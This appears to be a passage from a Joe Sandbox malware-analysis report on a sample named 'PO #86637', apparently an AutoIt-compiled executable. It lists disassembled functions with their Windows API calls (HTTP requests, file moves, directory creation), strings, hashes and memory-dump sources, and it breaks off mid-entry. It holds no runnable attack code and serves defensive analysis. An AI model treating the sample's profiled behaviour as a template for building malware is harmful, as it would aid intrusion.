                      • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                      • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                      • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                      Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                      • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                      • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                      • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                      Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ClearVariant
                      • String ID:
                      • API String ID: 1473721057-0
                      • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                      • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                      • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                      • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                      Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove$_memcmp
                      • String ID: '$\$h
                      • API String ID: 2205784470-1303700344
                      • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                      • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                      • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                      • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                      Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                      Download Yara Rule
                      APIs
                      • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                      • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                      • VariantClear.OLEAUT32 ref: 0045EA6D
                      • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                      • __swprintf.LIBCMT ref: 0045EC33
                      • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                      Strings
                      • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Variant$InitTime$ClearCopySystem__swprintf
                      • String ID: %4d%02d%02d%02d%02d%02d
                      • API String ID: 2441338619-1568723262
                      • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                      • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                      • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                      • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                      Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                      Download Yara Rule
                      APIs
                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                      • Sleep.KERNEL32(0000000A), ref: 0042C67F
                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Interlocked$DecrementIncrement$Sleep
                      • String ID: @COM_EVENTOBJ
                      • API String ID: 327565842-2228938565
                      • Opcode ID: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                      • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                      • Opcode Fuzzy Hash: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                      • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                      Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                      Download Yara Rule
                      APIs
                      • VariantClear.OLEAUT32(?), ref: 0047031B
                      • VariantClear.OLEAUT32(?), ref: 0047044F
                      • VariantInit.OLEAUT32(?), ref: 004704A3
                      • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                      • VariantClear.OLEAUT32(?), ref: 00470516
                        • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                      • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                        • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                      • VariantClear.OLEAUT32(00000000), ref: 0047060D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Variant$Clear$Copy$CallDispFuncInit
                      • String ID: H
                      • API String ID: 3613100350-2852464175
                      • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                      • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                      • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                      • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                      Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                      Download Yara Rule
                      APIs
                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                      • DestroyWindow.USER32(?), ref: 00426F50
                      • UnregisterHotKey.USER32(?), ref: 00426F77
                      • FreeLibrary.KERNEL32(?), ref: 0042701F
                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                      • String ID: close all
                      • API String ID: 4174999648-3243417748
                      • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                      • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                      • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                      • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                      Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                      Download Yara Rule
                      APIs
                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                      • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                      • String ID:
                      • API String ID: 1291720006-3916222277
                      • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                      • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                      • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                      • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                      Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                      • IsMenu.USER32(?), ref: 0045FC5F
                      • CreatePopupMenu.USER32 ref: 0045FC97
                      • GetMenuItemCount.USER32(?), ref: 0045FCFD
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                      • String ID: 0$2
                      • API String ID: 93392585-3793063076
                      • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                      • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                      • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                      • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                      Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                      Download Yara Rule
                      APIs
                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                      • VariantClear.OLEAUT32(?), ref: 00435320
                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                      • VariantClear.OLEAUT32(?), ref: 004353B3
                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                      • String ID: crts
                      • API String ID: 586820018-3724388283
                      • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                      • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                      • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                      • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                      Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                      • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                      • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                      • _wcscat.LIBCMT ref: 0044BCAF
                      • _wcslen.LIBCMT ref: 0044BCBB
                      • _wcslen.LIBCMT ref: 0044BCD1
                      • SHFileOperationW.SHELL32(?), ref: 0044BD17
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                      • String ID: \*.*
                      • API String ID: 2326526234-1173974218
                      • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                      • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                      • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                      • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                      Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                      • _wcslen.LIBCMT ref: 004335F2
                      • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                      • GetLastError.KERNEL32 ref: 0043362B
                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                      • _wcsrchr.LIBCMT ref: 00433666
                        • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                      • String ID: \
                      • API String ID: 321622961-2967466578
                      • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                      • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                      • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                      • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                      Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                      • API String ID: 1038674560-2734436370
                      • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                      • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                      • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                      • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                      Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                      • LoadStringW.USER32(00000000), ref: 00434060
                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                      • LoadStringW.USER32(00000000), ref: 00434078
                      • _wprintf.LIBCMT ref: 004340A1
                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                      Strings
                      • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: HandleLoadModuleString$Message_wprintf
                      • String ID: %s (%d) : ==> %s: %s %s
                      • API String ID: 3648134473-3128320259
                      • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                      • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                      • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                      • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                      Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                      • __lock.LIBCMT ref: 00417981
                        • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                        • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                        • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
